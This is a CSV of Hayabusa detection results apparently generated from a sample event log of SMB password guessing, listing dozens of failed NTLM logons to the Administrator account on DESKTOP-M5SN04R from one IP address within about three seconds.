2016-09-20 01:52:07.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gIufEPz8FBVd5yKe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6Blruxd110NvZjof  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0VsPitzItsjU3Y59  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HEq6vk4nTe3weSOP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.507 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lE8kvmcQtCmlsqtT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IXmfjxrGC3liZ2oh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 72JLcUBrhOoXPLzD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.635 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sRoFpK2ZvBYy4jGM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9KReiI3k2WIKpxFq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.722 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wsfSzPbji6ARhU0k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: axeCxygvJ4zL4Xoq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Y64sc51Y7vbiFTIQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o395tRQcfRBTTCSF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: K1R4wlYWS4SkM3dF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.938 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RsZy0Yjvk720Mu22  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c8RusStjhReKBmS0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eJuPYLTcGaGvErLg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: raCbua01mzU1Djuf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Fnt8atAbMtxXivUs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: psokvQJyMn5m5rMh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wTPGqOITsOhpTgIF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xxhGrLzhwNziihc9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UIb1lHuPaC62UlBp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2uvXuLIR9yvmWngF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.382 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MI35CCybjNtntfwo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.426 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0GTJfOkk0fUC5YCX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jk6PsiAiLPsHGUh1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KeGDMp9My5eLJz55  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BvDQphjvwOCsNQqB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sbJhad4aocvPMYVP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.635 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SJl3XqTUxvqiKKaG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: a1fAJDfguuoNxWiR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: daAeGcsqoqERsEu6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0iynnwxS8v4C5b3E  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.955 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2kU7IS4XCvgRpTff  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MBC8AJXBQHrCMrO2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NSGraDQmI4MAq9Ls  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B7u2Pb9y8hB0iYWh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: A657rbd6k4AD7M4i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7rkiDUBuTCU2jDXR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jjsCFTQoobrkQoWF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2dNXav95nZyBhVOc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Yeq1x56Ct6R2Nu3J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pUwyCNtwydEQu2bd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bX7eihAOk3PUgbwM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WPXqAsaYaXEr8I9L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4SaEmIpmlH1VMDun  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: a3Dvp43a2h7Mzx2H  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.575 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: g3voKlRXc7rIaIYs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GF1Q5OhCLRAi96mN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: caHe4iY2CQoiumQI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SJi6UAm6Pp6eax8Q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2EW0t2wapD8yniO4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PnaITXTihpB0stwx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tdBVoa82WKEAW2ce  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BelKzJrEjGIcU2dN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ujeb7fRHPGCGmFm2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Czwt7KF2sQHemwdJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LQQ4nNpbfKKVCJZH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6jwIc6e0AHAhXKK5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Nld9Job0Ll1Fgtmy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.242 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: q9sS6i9iU3PXhokz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: heaYv6Np8swhoVc9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.334 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I7rzgNBtUJkS93pO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gh45suNQ09FzPBjd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BOnwAGxxz994k6Ee  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.474 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: L26mvUKOgGptcKaZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aqldRjcLl8KFZr5h  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ycNPBtmRHShPOcRA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ISlMGsVvXry0rbju  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MjGjh70EQ5YVGJUt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yaYM5N2kuvuRCHRU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.738 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 32wgj2t7BLBviVxd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
